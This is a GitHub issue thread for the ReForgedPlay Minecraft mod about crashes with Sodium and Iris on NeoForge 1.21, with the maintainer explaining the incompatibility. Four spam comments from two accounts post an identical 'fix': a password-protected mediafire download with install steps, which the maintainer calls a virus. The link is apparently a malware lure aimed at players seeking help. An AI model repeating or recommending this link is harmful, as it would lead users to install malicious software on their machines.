### ISSUE TITLE
Crashes With Sodium/Iris 1.21

### ISSUE THREAD

**Issue by blackspider9678** [ferriarnus/ReForgedPlay#19]
I have Sodium and Iris downloaded for some shaders and it closes the game on me instantly when I have this mod in the same folder. It works for all the other mods though.
I am currently running this on NeoForge 1.21

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ferriarnus** [comment]
A virus, don't use

**Comment by ferriarnus** [comment]
Correct, iris and sodium changed a lot moving to 1.21, so currenlty, they are not supported. Embeddium can be used  instead of sodium, iris does currently not have a replacement.

**Comment by adaliszk** [comment]
On my end Iris and Sodium works mostly fine, the only issue is that once the timeline jumps, they load all blocks without any occlusion, so everything overlaps. If it were possible to add a quick toggle to refresh shaders on timeline jump, that would be really helpful!
